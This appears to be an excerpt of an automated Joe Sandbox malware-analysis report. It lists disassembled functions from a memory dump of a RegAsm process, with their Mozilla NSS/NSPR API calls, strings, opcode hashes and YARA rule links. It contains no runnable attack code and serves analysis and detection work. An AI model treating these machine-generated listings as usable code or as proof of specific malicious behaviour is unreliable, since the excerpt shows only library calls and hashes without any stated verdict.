Part of subcall function 6CAF9890: TlsGetValue.KERNEL32(?,?,?,6CAF97EB), ref: 6CAF989E

EnterCriticalSection.KERNEL32(?), ref: 6CB49D78
calloc.MOZGLUE(00000001,0000000C), ref: 6CB49DAF
_PR_CreateThread.NSS3(00000000,6CB49EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB49D9F

Part of subcall function 6CA1B3C0: TlsGetValue.KERNEL32 ref: 6CA1B403
Part of subcall function 6CA1B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CA1B459

_PR_CreateThread.NSS3(00000000,6CB4A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB49DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6CB49DFC
_PR_CreateThread.NSS3(00000000,6CB4A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB49E29
calloc.MOZGLUE(00000001,0000000C), ref: 6CB49E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6CB49E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB49E89

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 6a29d2376000b8731ca4da7854b12b25a2d920ac07f7d5f7af7bb002be6049a0
Instruction ID: a624919a4df4d9f29b109ca6a60432a93f254b5e2b8a5117ddb4e4ae5cf35a9a
Opcode Fuzzy Hash: 6a29d2376000b8731ca4da7854b12b25a2d920ac07f7d5f7af7bb002be6049a0
Instruction Fuzzy Hash: 75614DB1E04746AFD710DF75D944AA7BBF8FF09208B04852AE859C7B10E730E858CBA1

Function 6CA88E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CA88E01,00000000,6CA89060,6CB90B64), ref: 6CA88E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CA88E01,00000000,6CA89060,6CB90B64), ref: 6CA88E9E
PORT_ArenaAlloc_Util.NSS3(6CB90B64,00000001,?,?,?,?,6CA88E01,00000000,6CA89060,6CB90B64), ref: 6CA88EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CA88E01,00000000,6CA89060,6CB90B64), ref: 6CA88EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CA88E01,00000000,6CA89060,6CB90B64), ref: 6CA88ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CA88E01,00000000,6CA89060,6CB90B64), ref: 6CA88EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CA88E01), ref: 6CA88EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CB90B64,6CB90B64), ref: 6CA88F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CA88F3F

Part of subcall function 6CA8A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CA8A421,00000000,00000000,6CA89826), ref: 6CA8A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA8904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CA88E76

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 28e51decdefd2a59043639f77b9e92d211296ea69792cb4a5d3cb9e602d76e9c
Instruction ID: a3163679e58885fe85212641551eaf810c9c8fafa68f4a1cc7df19442ac40556
Opcode Fuzzy Hash: 28e51decdefd2a59043639f77b9e92d211296ea69792cb4a5d3cb9e602d76e9c
Instruction Fuzzy Hash: 1E61A2B5D011469BDB10CF65CD80AAFB7B9FF84358F184528DC18A7740EB32AD55CBA0

Function 6CA38E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA38E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA38E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA38EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CB618D0,?), ref: 6CA38F03
PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA38F19
PL_FreeArenaPool.NSS3(?), ref: 6CA38F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA38F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA38F65
PL_FinishArenaPool.NSS3(?), ref: 6CA38FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CA38FFE
PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA39012
PL_FreeArenaPool.NSS3(?), ref: 6CA39024
PL_FinishArenaPool.NSS3(?), ref: 6CA3902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CA3903E

Strings

security, xrefs: 6CA38EE7

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 7cd84f4369679223b4a6ccc9100a7882e408c2c8b457ba46333a56d3446eeb30
Instruction ID: a264c7f27a544817320ee1fcc49434207203f9a635fe37715581099a0eb0e10e
Opcode Fuzzy Hash: 7cd84f4369679223b4a6ccc9100a7882e408c2c8b457ba46333a56d3446eeb30
Instruction Fuzzy Hash: 0C5168B2908350ABD7009E15DD51BAB73E8AF8675CF54182FF548D7B80E731D9888753

Function 6CA64E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CA64E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA64EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA64EC7

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA64EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CA64F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA64F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CA64F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CA64F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CA64F68

Strings

hObject = 0x%x, xrefs: 6CA64EF5, 6CA64F05
C_GetAttributeValue, xrefs: 6CA64E7E
(CK_INVALID_HANDLE), xrefs: 6CA64EC0, 6CA64F13
ulCount = %d, xrefs: 6CA64F63
hSession = 0x%x, xrefs: 6CA64EA2, 6CA64EB2
pTemplate = 0x%p, xrefs: 6CA64F4A

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: a82061e80cd8692aa0d1dc0e8bb4b45afe96d29199788af1eebad67375e6e6c4
Instruction ID: dbb87f517146ecd53da105582899d51902264678fec9a87349b2a98e578049d8
Opcode Fuzzy Hash: a82061e80cd8692aa0d1dc0e8bb4b45afe96d29199788af1eebad67375e6e6c4
Instruction Fuzzy Hash: AC410E35A41194AFDB00CF15EE98F9E77B5AF4371DF488028E90897E51DB30999CCBA2

Function 6CA64CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CA64CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA64D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA64D37

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA64D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CA64D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA64D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CA64DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CA64DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CA64E20

Strings

hObject = 0x%x, xrefs: 6CA64D65, 6CA64D75
(CK_INVALID_HANDLE), xrefs: 6CA64D30, 6CA64D83
pulSize = 0x%p, xrefs: 6CA64DB7
hSession = 0x%x, xrefs: 6CA64D12, 6CA64D22
*pulSize = 0x%x, xrefs: 6CA64E1B
C_GetObjectSize, xrefs: 6CA64CEE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 6a2ba5f2bd9724b27093f65d96df45924dbee178b338f1cd84ea16a3fd9b5046
Instruction ID: 128dbb6f5253fcb4704856c0b36b72f5d9dc91c193961fe1ac945092f53fb968
Opcode Fuzzy Hash: 6a2ba5f2bd9724b27093f65d96df45924dbee178b338f1cd84ea16a3fd9b5046
Instruction Fuzzy Hash: 6941F235A40190EFDB00CF15EE98F6A37B5EB4731DF488024E908ABE51DB30999CCB92

Function 6CA67C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6CA67CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA67CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA67CF3

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA67D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CA67D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CA67D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CA67D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CA67D77

Strings

ulSignatureLen = %d, xrefs: 6CA67D72
(CK_INVALID_HANDLE), xrefs: 6CA67CEC
ulDataLen = %d, xrefs: 6CA67D40
pData = 0x%p, xrefs: 6CA67D25
pSignature = 0x%p, xrefs: 6CA67D59
hSession = 0x%x, xrefs: 6CA67CCE, 6CA67CDE
C_Verify, xrefs: 6CA67CB1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: 19400a3907457bd7123dab1dbd87597d339b3d1c3a928112a57e2b9f47409a66
Instruction ID: 3332dc2785a92f74bcd189a969d91720773405f0370ecc46e13854f47a395f2d
Opcode Fuzzy Hash: 19400a3907457bd7123dab1dbd87597d339b3d1c3a928112a57e2b9f47409a66
Instruction Fuzzy Hash: B531D535A01194EFDB009F65EE48F6A37B5AF4731DF488424E50897E11DB30889CCFA2

Function 6CAFCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CAFCC7B), ref: 6CAFCD7A

Part of subcall function 6CAFCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CA6C1A8,?), ref: 6CAFCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CAFCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CAFCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CAFCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CAFCD8E

Part of subcall function 6CA205C0: PR_EnterMonitor.NSS3 ref: 6CA205D1
Part of subcall function 6CA205C0: PR_ExitMonitor.NSS3 ref: 6CA205EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CAFCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CAFCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CAFCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CAFCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CAFCE48

Strings

ws2_32.dll, xrefs: 6CAFCD75
freeaddrinfo, xrefs: 6CAFCD9F, 6CAFCE10
wship6.dll, xrefs: 6CAFCDE3
getnameinfo, xrefs: 6CAFCDB2, 6CAFCE23
getaddrinfo, xrefs: 6CAFCD88, 6CAFCDF9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 6ab88a48c29b80ccfad2e0b1c33ea8cda9f30b1eb71a325124ede3ac4cc2c04f
Instruction ID: af43673f9692f0e6d8c298d6dcdf4558a6efe09e2b028ab5c9b5d265430ef4a8
Opcode Fuzzy Hash: 6ab88a48c29b80ccfad2e0b1c33ea8cda9f30b1eb71a325124ede3ac4cc2c04f
Instruction Fuzzy Hash: 9F1106BAE1216056DB21AA33AE00AAE3C6C5B1311DF1C4534F819D3F01FB34C59E92F2

Function 6CB41C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CB413BC,?,?,?,6CB41193), ref: 6CB41C6B
PR_NewLock.NSS3(?,6CB41193), ref: 6CB41C7E

Part of subcall function 6CAF98D0: calloc.MOZGLUE(00000001,00000084,6CA20936,00000001,?,6CA2102C), ref: 6CAF98E5

PR_NewCondVar.NSS3(00000000,?,6CB41193), ref: 6CB41C91

Part of subcall function 6CA1BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA221BC), ref: 6CA1BB8C

PR_NewCondVar.NSS3(00000000,?,?,6CB41193), ref: 6CB41CA7

Part of subcall function 6CA1BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA1BBEB
Part of subcall function 6CA1BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CA1BBFB
Part of subcall function 6CA1BB80: GetLastError.KERNEL32 ref: 6CA1BC03
Part of subcall function 6CA1BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CA1BC19
Part of subcall function 6CA1BB80: free.MOZGLUE(00000000), ref: 6CA1BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6CB41193), ref: 6CB41CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6CB41193), ref: 6CB41CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CB41193), ref: 6CB41CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6CB41193), ref: 6CB41D1A

Part of subcall function 6CAF9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA21A48), ref: 6CAF9BB3
Part of subcall function 6CAF9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA21A48), ref: 6CAF9BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CB41193), ref: 6CB41D3D

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6CB41193), ref: 6CB41D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CB41193), ref: 6CB41D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CB41193), ref: 6CB41D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CB41193), ref: 6CB41D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6CB41193), ref: 6CB41D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6CB41193), ref: 6CB41D93
PR_DestroyLock.NSS3(00000000,?,?,6CB41193), ref: 6CB41D9F
free.MOZGLUE(00000000,?,6CB41193), ref: 6CB41DA8

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 3a6927bc808c419e7e4431889dc5dfde24f3d0960b8eafa8fc6d4a33d7d08309
Instruction ID: 2c7280c1249c26938907a864a7109dafaa3e3ac8d40d6d364db8ff4f8a37bd24
Opcode Fuzzy Hash: 3a6927bc808c419e7e4431889dc5dfde24f3d0960b8eafa8fc6d4a33d7d08309
Instruction Fuzzy Hash: AE31B5F1E047115BEB109F34AD41A5776F8AF0564DB084538E85A87F41FB31E558CBA2

Function 6CA95CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CA95EC0,00000000,?,?), ref: 6CA95CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CA95CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CA95CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CA95D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CA95EC0,00000000,?,?), ref: 6CA95D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CA95D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA95D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA95D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CA95D80

Strings

extern:, xrefs: 6CA95CEA, 6CA95D4B
NSS_DEFAULT_DB_TYPE, xrefs: 6CA95D1A
dbm:, xrefs: 6CA95D03, 6CA95D60
sql:, xrefs: 6CA95CD1, 6CA95D36
multiaccess:, xrefs: 6CA95CB8

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 087e10181046d9791bb40c2eca1ac9c2927a7d0d51ed1afc1da1b738992d9315
Instruction ID: 74174311c5c4002e0e5663fc483f9bddaeb049c9e697a10e747dac8649ad27b3
Opcode Fuzzy Hash: 087e10181046d9791bb40c2eca1ac9c2927a7d0d51ed1afc1da1b738992d9315
Instruction Fuzzy Hash: A63124F4B123416BE7119A24DC4BB2633E8AF0325BF180230EDA5B7A91E7A5E551C7A1

Function 6CA96CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CB61DE0,?), ref: 6CA96CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA96D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CA96D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CA96D82
DER_GetInteger_Util.NSS3(?), ref: 6CA96DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA96DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CA96E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CA96F19
PK11_DigestBegin.NSS3(00000000), ref: 6CA96F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CA96F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA97011
PK11_FreeSymKey.NSS3(00000000), ref: 6CA97033
free.MOZGLUE(?), ref: 6CA9703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CA97060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CA97087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CA970AF

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 3bd5c3780a9b04be66441512d025adb950fa756d2d92f41948c58254f1f9a0a6
Instruction ID: cdad83ebd0c269fabe6d8819c34490644a8ba73a7db10dd9f6d7808afda01974
